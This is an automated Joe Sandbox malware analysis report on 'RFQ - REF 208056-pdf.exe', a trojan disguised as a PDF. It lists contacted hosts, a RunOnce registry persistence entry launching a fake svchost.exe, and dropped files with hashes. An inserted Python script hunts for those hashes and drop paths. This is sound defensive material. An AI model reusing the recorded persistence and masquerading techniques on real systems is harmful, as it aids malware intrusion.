                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RFQ - REF 208056-pdf.exe, 00000000.00000002.403215923.0000000002581000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.539506519.0000000005161000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.524567158.00000000034C1000.00000004.00000001.sdmp, powershell.exe, 00000011.00000002.524025636.00000000050C1000.00000004.00000001.sdmp | false | | high
                      http://www.bingmapsportal.com | svchost.exe, 00000005.00000002.307256810.00000243FF013000.00000004.00000001.sdmp | false | | high
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | RFQ - REF 208056-pdf.exe, 00000000.00000002.509634686.0000000003B23000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.544302148.000000000477A000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                      https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/ | svchost.exe, 00000005.00000002.307284356.00000243FF03E000.00000004.00000001.sdmp | false | | high
                      http://www.microsoft.coaHp | powershell.exe, 00000011.00000002.547914635.0000000008310000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                      https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx | svchost.exe, 00000005.00000003.306998078.00000243FF061000.00000004.00000001.sdmp | false | | high
                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r= | svchost.exe, 00000005.00000003.307045052.00000243FF046000.00000004.00000001.sdmp | false | | high
                      http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000011.00000002.524764005.0000000005201000.00000004.00000001.sdmp | false | |
                                                          high
                                                          https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000005.00000002.307284356.00000243FF03E000.00000004.00000001.sdmpfalse
                                                            high
                                                            https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 00000005.00000003.285270099.00000243FF031000.00000004.00000001.sdmpfalse
                                                              high
                                                              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000005.00000003.307045052.00000243FF046000.00000004.00000001.sdmpfalse
                                                                high
                                                                https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000005.00000003.307034624.00000243FF041000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sRFQ - REF 208056-pdf.exe, 00000000.00000002.492361781.000000000395D000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.554662869.0000000007201000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://activity.windows.comrsvchost.exe, 00000003.00000002.513627906.000002451B03E000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000005.00000002.307284356.00000243FF03E000.00000004.00000001.sdmp, svchost.exe, 00000005.00000002.307256810.00000243FF013000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    https://%s.xboxlive.comsvchost.exe, 00000003.00000002.513627906.000002451B03E000.00000004.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    low
                                                                    https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000005.00000003.307003492.00000243FF04D000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000005.00000003.285270099.00000243FF031000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000005.00000003.285270099.00000243FF031000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 00000005.00000003.306998078.00000243FF061000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tRFQ - REF 208056-pdf.exe, 00000000.00000002.492361781.000000000395D000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.554662869.0000000007201000.00000004.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000005.00000002.307307178.00000243FF05D000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              http://crl.mpowershell.exe, 00000011.00000002.551437427.0000000009B51000.00000004.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.svchost.exe, 00000002.00000002.532241708.000001EAA1F60000.00000002.00000001.sdmpfalse
                                                                                high
                                                                                https://dynamic.tsvchost.exe, 00000005.00000003.307003492.00000243FF04D000.00000004.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#RFQ - REF 208056-pdf.exe, 00000000.00000002.492361781.000000000395D000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.554662869.0000000007201000.00000004.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000005.00000003.306998078.00000243FF061000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000011.00000002.524764005.0000000005201000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    https://dev.ditu.live.com/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000005.00000002.307267041.00000243FF029000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 00000005.00000003.285270099.00000243FF031000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000005.00000002.307307178.00000243FF05D000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          https://activity.windows.comsvchost.exe, 00000003.00000002.513627906.000002451B03E000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 00000005.00000003.306998078.00000243FF061000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              https://%s.dnet.xboxlive.comsvchost.exe, 00000003.00000002.513627906.000002451B03E000.00000004.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              low
                                                                                              https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000005.00000003.307021748.00000243FF04A000.00000004.00000001.sdmpfalse
                                                                                                high

Contacted IPs

Public

IP              Domain    Country         ASN    ASN Name          Malicious
172.67.172.17   unknown   United States   13335  CLOUDFLARENETUS   true

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 358398
Start date: 25.02.2021
Start time: 15:14:01
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 17m 0s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: RFQ - REF 208056-pdf.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes: 36
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@37/15@3/3
EGA Information: Failed
HDC Information:
• Successful, ratio: 7.2% (good quality ratio 6.8%)
• Quality average: 82.1%
• Quality standard deviation: 27%
HCA Information:
• Successful, ratio: 93%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, WmiPrvSE.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 51.103.5.186, 51.104.144.132, 131.253.33.200, 13.107.22.200, 52.255.188.83, 104.42.151.234, 52.147.198.201, 23.211.6.115, 184.30.20.56, 51.11.168.160, 2.20.142.209, 2.20.142.210, 92.122.213.194, 92.122.213.247, 104.43.139.144, 20.54.26.129, 52.155.217.156
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus16.cloudapp.net, dual-a-0001.dc-msedge.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, vip2-par02p.wns.notify.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Report creation exceeded maximum time and may have missing behavior and disassembly information.
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time      Type             Description
15:15:04  API Interceptor  2x Sleep call for process: svchost.exe modified
15:15:31  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce XZFSGXzndMljLVEovPfqdS explorer.exe "C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe"
15:15:39  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce XZFSGXzndMljLVEovPfqdS explorer.exe "C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe"
15:15:57  API Interceptor  25x Sleep call for process: powershell.exe modified
16:16:20  API Interceptor  1x Sleep call for process: MpCmdRun.exe modified

                                                                                                Joe Sandbox View / Context


Domains

Match   Associated Sample Name / URL   SHA 256   Detection   Link   Context
                                                                                                2070121SN-WS.exeGet hashmaliciousBrowse
                                                                                                • 172.67.172.17
                                                                                                DOC-654354.xlsxGet hashmaliciousBrowse
                                                                                                • 104.21.71.230
                                                                                                xQHJ4rJmTi.exeGet hashmaliciousBrowse
                                                                                                • 104.21.71.230
                                                                                                RFQ CSDOK202040890.exeGet hashmaliciousBrowse
                                                                                                • 104.21.71.230
                                                                                                SAL-0908889000.exeGet hashmaliciousBrowse
                                                                                                • 104.21.71.230
                                                                                                Purchase Order_Pdf.exeGet hashmaliciousBrowse
                                                                                                • 104.21.71.230
                                                                                                Payment Notification.docGet hashmaliciousBrowse
                                                                                                • 172.67.172.17
                                                                                                SecuriteInfo.com.Artemis30F445BB737F.24261.exeGet hashmaliciousBrowse
                                                                                                • 104.21.71.230
                                                                                                PO98000000090.jarGet hashmaliciousBrowse
                                                                                                • 172.67.172.17
                                                                                                P O DZ564955B.exeGet hashmaliciousBrowse
                                                                                                • 172.67.172.17

ASN

Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Context
CN-Invoice-XXXXX9808-19011143287994.exe | malicious | 172.67.172.17
twistercrypted.exe | malicious | 104.18.28.12
C1 PureQuest PO S1026710.xlsm | malicious | 104.16.19.94
C1 PureQuest PO S1026710.xlsm | malicious | 104.16.18.94
C1 PureQuest PO S1026710.xlsm | malicious | 104.17.234.204
Returned Message Body.exe | malicious | 172.67.188.154
W175EHpHv3.exe | malicious | 172.67.194.108
Bankdaten #f6356.pdf.exe | malicious | 172.67.188.154
W175EHpHv3.exe | malicious | 172.67.194.108
PO#2102003.exe | malicious | 172.67.188.154
Qvc Order .exe | malicious | 172.67.188.154
company inquiry.exe | malicious | 172.67.188.154
Neue Bestellung_WJO-001, pdf.exe | malicious | 104.21.19.200
Order NX-LI-15-0001.exe | malicious | 104.21.19.200
TNT eInvoice_pdf.exe | malicious | 172.67.188.154
000INV00776.exe | malicious | 172.67.188.154
SAES-0077766.exe | malicious | 104.21.19.200
PO.Attached98736.PDF.exe | malicious | 104.21.19.200
mif000262021.exe | malicious | 172.67.188.154
PAYMENT SWIFT USD96110_PDF.exe | malicious | 104.21.19.200

JA3 Fingerprints

No context

Dropped Files

Match: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe
Associated Sample Name / URL | Detection
CN-Invoice-XXXXX9808-19011143287994.exe | malicious
PRODUCT SPECIFICATION.exe | malicious
DHL_document1102202068090891.exe | malicious
em6eElVbOm.exe | malicious
Purchase Order_Pdf.exe | malicious
Fireman.exe | malicious
NEW ORDER.exe | malicious
CN-Invoice-XXXXX9808-19011143287993.exe | malicious
payment confirmation 0029175112.exe | malicious
Vrxs6evJO7.exe | malicious
SecuriteInfo.com.Trojan.GenericKD.36380495.3131.exe | malicious
RMe2JcmlSh.exe | malicious
New Order 2300030317388 InterMetro.exe | malicious
CN-Invoice-XXXXX9808-19011143287989.exe | malicious
PURCHASE ITEMS.exe | malicious
CN-Invoice-XXXXX9808-19011143287992.exe | malicious
quotation_PR # 00459182..exe | malicious
PURCHASE ORDER CONFIRMATION.exe | malicious
New Order.exe | malicious
PO#87498746510.exe | malicious

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 4096
Entropy (8bit): 0.597889115294713
Encrypted: false
SSDEEP: 6:0FvMk1GaD0JOCEfMuaaD0JOCEfMKQmD2utAl/gz2cE0fMbhEZolrRSQ2hyYIIT:05GaD0JcaaD0JwQQ2utAg/0bjSQJ
MD5: C664243FC27035F720256C6B25D79A29
SHA1: 24F1AF0205F776EDF15128AE46A6DABA6450F8C7
SHA-256: 4CDBB7488D24303793F8CF2D0C03BB25443CFEE2BB0D319C73909E91E500E0F3
SHA-512: B559AA386F3EE1A63C2C07439817EBF38CA9E3EE52DCE327D5BFAB7A17F9F1243FAA74FA3CBEA643B9C877428E81DD7F6FC1239C3655C4BDAFDA6DE2635A390E
Malicious: false
                                                                                                                                        Preview: ......:{..(..........y............... ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@........................y............&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Process: C:\Windows\System32\svchost.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0x614d938a, page size 16384, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 32768
Entropy (8bit): 0.09469397928593626
Encrypted: false
SSDEEP: 6:5zwl/+zVRIE11Y8TRXxc7lwqKfzwl/+zVRIE11Y8TRXxc7lwqK:50+zVO4blMwqKf0+zVO4blMwqK
MD5: E2D4D11F0701256A691B3C649505527D
SHA1: 2C6BCCBE7748E05DC1E80A165C58C79B3A2C1ECD
SHA-256: 1CB400EB6534FA7DCB5A2EDA443B9AD6797AD23C0AD52BE728B9A3432A95FB37
SHA-512: D8BB1A654E7A7F153536044C933FD53B32A1834C445F01D360008809207E372A507499D3A76EA9C2DF00A1196EA743324788F43BFC498660D4345424BA038F12
Malicious: false
                                                                                                                                        Preview: aM..... ................e.f.3...w........................&..........w.......y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w........................................................................................................................................................................................................................................3.....y...................|.......y..........................................................................................................................................................................................................................................................................................................................................................................................
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 8192
Entropy (8bit): 0.1093288637601826
Encrypted: false
SSDEEP: 3:QhRm/t7EvgJ8BK+Al/bJdAti/0cwX/all:QHm1igJN+At4glwG
MD5: 866F5280185C6141740F793982D4D490
SHA1: DC9BBAAFE4CA6E76B5EC3934B1E6B4874A905A46
SHA-256: FA3BE1BEB42DDDE6BF6E1264FDE7B9EBD8B8670BB527DA964A460B39E9C10531
SHA-512: F77A01D64895543819100DC0F2BC33AE67736BDF169E82877CBE15D8184C2F9F587FE510217282502F835C2D4759A2B9E180A17003E49D7200BE3378F170AF3A
Malicious: false
                                                                                                                                        Preview: Y$.4.....................................3...w.......y.......w...............w.......w....:O.....w...................|.......y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 14734
Entropy (8bit): 4.993014478972177
Encrypted: false
SSDEEP: 384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
MD5: 8D5E194411E038C060288366D6766D3D
SHA1: DC1A8229ED0B909042065EA69253E86E86D71C88
SHA-256: 44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
SHA-512: 21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
Malicious: false
                                                                                                                                        Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
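Each record above gives the process that wrote the file, its size and hashes, and a Malicious flag, and every one of them is Malicious:false, a verdict on the file content rather than on who wrote it. For hunting, the useful pivots are therefore the dropping process (the sample itself versus a Windows system binary such as svchost.exe or powershell.exe), the SHA-256 values, and the drop location the Dropped Files context table shows for AdvancedRun.exe: a GUID-named directory under the user's AppData\Local\Temp. The script below is an added example and not part of the Joe Sandbox report. It parses a constructed copy of the page's key/value record layout (two records, with the paths, writing processes and SHA-256 values taken from this report), keeps only files written by something other than a binary under the Windows directory, and then sweeps a directory tree for either a matching SHA-256 or the GUID temp-directory AdvancedRun.exe path. The function names and the GUID-directory pattern are this example's own assumptions.

```python
"""Turn this report's "Created / dropped Files" records into hunt indicators
and sweep a directory tree for them.  Added example, not part of the Joe
Sandbox report; REPORT_RECORDS is a constructed copy of two records in the
page's own key/value layout, and the function names and GUID-directory
pattern are this example's assumptions."""
import hashlib
import os
import re
import sys
from dataclasses import dataclass, field

# Constructed copy of two records from the page (values as listed there).
REPORT_RECORDS = r"""
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Process:C:\Windows\System32\svchost.exe
File Type:Extensible storage engine DataBase, version 0x620, checksum 0x614d938a, page size 16384, DirtyShutdown, Windows version 10.0
Size (bytes):32768
SHA-256:1CB400EB6534FA7DCB5A2EDA443B9AD6797AD23C0AD52BE728B9A3432A95FB37
Malicious:false
C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe
Process:C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes):91000
SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
Malicious:false
"""
RECORD_START = re.compile(r"^[A-Za-z]:\\")  # a full Windows path opens a record
KEY_VALUE = re.compile(r"^([^:]+):(.*)$")  # "Key:Value" (space after ':' optional)
WINDOWS_DIR = "c:\\windows\\"
# Drop location the report shows: ...\AppData\Local\Temp\<GUID>\AdvancedRun.exe
DROP_PATTERN = re.compile(
    r"\\AppData\\Local\\Temp\\[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}"
    r"\\AdvancedRun\.exe$", re.IGNORECASE)


@dataclass
class DroppedFile:
    path: str
    fields: dict = field(default_factory=dict)

    @property
    def process(self) -> str:
        return self.fields.get("Process", "")

    @property
    def sha256(self) -> str:
        return self.fields.get("SHA-256", "").lower()


def parse_records(text: str) -> list:
    """Parse the report's record layout into DroppedFile objects."""
    records, current = [], None
    for line in (l.strip() for l in text.splitlines() if l.strip()):
        if RECORD_START.match(line):
            current = DroppedFile(line)
            records.append(current)
        elif current is not None and (m := KEY_VALUE.match(line)):
            current.fields[m.group(1).strip()] = m.group(2).strip()
    return records


def dropped_by_sample(records: list) -> list:
    """Keep files whose writer is not a binary under the Windows directory.
    Malicious:false is a verdict on content, not on the writer: the BITS
    database written by svchost.exe is noise here, the AdvancedRun.exe
    written by the sample itself is the artifact worth hunting."""
    return [r for r in records if not r.process.lower().startswith(WINDOWS_DIR)]


def path_matches_drop_pattern(path: str) -> bool:
    """True for <anything>\\AppData\\Local\\Temp\\<GUID>\\AdvancedRun.exe."""
    return DROP_PATTERN.search(path.replace("/", "\\")) is not None


def sha256_file(path: str, chunk: int = 1 << 20) -> str:
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            digest.update(block)
    return digest.hexdigest()


def hunt(root: str, indicators: list) -> dict:
    """Walk root; return {local path: [reasons]} for every hash or path hit."""
    wanted = {r.sha256: r.path for r in indicators if r.sha256}
    hits = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            local, reasons = os.path.join(dirpath, name), []
            if path_matches_drop_pattern(local):
                reasons.append("path matches the GUID temp-dir AdvancedRun.exe drop")
            try:
                digest = sha256_file(local)
            except OSError:
                digest = None  # unreadable file: still report a path hit
            if digest in wanted:
                reasons.append("sha256 matches reported " + wanted[digest])
            if reasons:
                hits[local] = reasons
    return hits


if __name__ == "__main__":
    indicators = dropped_by_sample(parse_records(REPORT_RECORDS))
    root = sys.argv[1] if len(sys.argv) > 1 else os.getcwd()
    for path, why in hunt(root, indicators).items():
        print(path, "->", "; ".join(why))
```

Run it with the directory to sweep as the first argument; without one it sweeps the current directory. The hash check is exact, so a rebuilt or differently packed AdvancedRun.exe would slip past it, which is why the path check is kept alongside: the GUID-named temp directory plus the tool name is the behaviour the report records, independent of the file's bytes. Low AV detection figures for the dropped file, as the report lists for AdvancedRun.exe, are a further reason not to rely on the content verdict alone.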
C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe
Process: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 91000
Entropy (8bit): 6.241345766746317
Encrypted: false
SSDEEP: 1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
MD5: 17FC12902F4769AF3A9271EB4E2DACCE
SHA1: 9A4A1581CC3971579574F837E110F3BD6D529DAB
SHA-256: 29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
SHA-512: 036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
Malicious: false
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Joe Sandbox View:
                                                                                                                                        • Filename: CN-Invoice-XXXXX9808-19011143287994.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: PRODUCT SPECIFICATION.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: DHL_document1102202068090891.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: em6eElVbOm.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: Purchase Order_Pdf.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: Fireman.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: NEW ORDER.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: CN-Invoice-XXXXX9808-19011143287993.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: payment confirmation 0029175112.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: Vrxs6evJO7.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: SecuriteInfo.com.Trojan.GenericKD.36380495.3131.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: RMe2JcmlSh.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: New Order 2300030317388 InterMetro.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: CN-Invoice-XXXXX9808-19011143287989.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: PURCHASE ITEMS.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: CN-Invoice-XXXXX9808-19011143287992.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: quotation_PR # 00459182..exe, Detection: malicious, Browse
                                                                                                                                        • Filename: PURCHASE ORDER CONFIRMATION.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: New Order.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: PO#87498746510.exe, Detection: malicious, Browse
                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\test.bat
Process:C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe
File Type:ASCII text, with very long lines, with CRLF line terminators
Category:modified
Size (bytes):8399
Entropy (8bit):4.665734428420432
Encrypted:false
SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
MD5:B2A5EF7D334BDF866113C6F4F9036AAE
SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
Malicious:false
